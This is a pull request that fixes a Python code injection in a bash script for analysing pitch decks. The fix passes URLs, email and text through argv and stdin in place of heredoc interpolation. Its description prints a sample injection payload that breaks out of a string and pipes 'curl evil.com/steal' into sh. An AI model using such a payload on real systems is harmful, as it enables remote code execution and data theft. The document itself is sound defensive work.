### PR TITLE
Fix Python code injection in deck-analyzer bash script

### DIFF
--- a/skills/deck-analyzer/deck-analyzer
+++ b/skills/deck-analyzer/deck-analyzer
@@ -40,44 +40,45 @@ case "$ACTION" in
         
         DECK_URL="$1"
         SENDER_EMAIL="${2:-}"
-        
+
         echo "🔍 Analyzing deck: $DECK_URL"
         echo ""
-        
-        # Create a temporary Python script to use the analyzer functions
-        python3 << PYTHON
+
+        # Pass URL and email as command-line arguments to avoid shell injection
+        # via heredoc interpolation
+        python3 -c "
 import sys
-sys.path.insert(0, '$SKILL_DIR')
+sys.path.insert(0, sys.argv[1])
 from analyzer import fetch_deck_content, analyze_deck_with_claude, format_company_description
 import json
 
-deck_url = "$DECK_URL"
-sender_email = "$SENDER_EMAIL"
+deck_url = sys.argv[2]
+sender_email = sys.argv[3] if len(sys.argv) > 3 else ''
 
-print("  📥 Fetching deck content...")
+print('  📥 Fetching deck content...')
 content = fetch_deck_content(deck_url, sender_email)
 
 if not content:
-    print("  ❌ Failed to fetch deck content")
+    print('  ❌ Failed to fetch deck content')
     sys.exit(1)
 
-print("  🤖 Analyzing with Claude AI...")
+print('  🤖 Analyzing with Claude AI...')
 info = analyze_deck_with_claude(content)
 
 if not info:
-    print("  ❌ Failed to analyze deck")
+    print('  ❌ Failed to analyze deck')
     sys.exit(1)
 
-print("  ✅ Analysis complete!\n")
-print("=" * 60)
-print("EXTRACTED INFORMATION (JSON)")
-print("=" * 60)
+print('  ✅ Analysis complete!\n')
+print('=' * 60)
+print('EXTRACTED INFORMATION (JSON)')
+print('=' * 60)
 print(json.dumps(info, indent=2))
-print("\n" + "=" * 60)
-print("HUBSPOT-FORMATTED DESCRIPTION")
-print("=" * 60)
+print('\n' + '=' * 60)
+print('HUBSPOT-FORMATTED DESCRIPTION')
+print('=' * 60)
 print(format_company_description(info))
-PYTHON
+" "$SKILL_DIR" "$DECK_URL" "$SENDER_EMAIL"
         ;;
     
     extract-links)
@@ -94,21 +95,22 @@ PYTHON
             TEXT=$(cat)
         fi
         
-        python3 << PYTHON
+        # Pass text via stdin to avoid shell injection via heredoc interpolation
+        printf '%s' "$TEXT" | python3 -c "
 import sys
-sys.path.insert(0, '$SKILL_DIR')
+sys.path.insert(0, sys.argv[1])
 from analyzer import extract_deck_links
 
-text = """$TEXT"""
+text = sys.stdin.read()
 links = extract_deck_links(text)
 
 if links:
-    print("Found {} deck link(s):".format(len(links)))
+    print('Found {} deck link(s):'.format(len(links)))
     for link in links:
-        print("  • {}".format(link))
+        print('  • {}'.format(link))
 else:
-    print("No deck links found")
-PYTHON
+    print('No deck links found')
+" "$SKILL_DIR"
         ;;
     
     test)


### PR DESCRIPTION
## Summary
- Fix **CRITICAL** Python code injection in the `deck-analyzer` bash script
- `$DECK_URL` and `$SENDER_EMAIL` were interpolated directly into Python heredoc strings, allowing arbitrary Python code execution

## Changes
- `analyze` action: Pass `DECK_URL` and `SENDER_EMAIL` as `sys.argv` command-line arguments instead of interpolating into heredoc
- `extract-links` action: Pass `TEXT` via stdin pipe instead of triple-quoted heredoc interpolation

## Attack Vector
An attacker sends an email with a deck URL like:
```
"; import os; os.system('curl evil.com/steal | sh'); x="
```
The deck-analyzer script interpolates this into a Python heredoc, breaking out of the string and executing arbitrary code.

## Test plan
- [ ] Verify `deck-analyzer analyze <url>` still works with normal URLs
- [ ] Verify `deck-analyzer analyze <url> <email>` passes both args correctly
- [ ] Verify `deck-analyzer extract-links` works with both file and stdin input
- [ ] Test with URLs containing special characters: `"`, `'`, spaces, `$`

🤖 Generated with [Claude Code](https://claude.com/claude-code)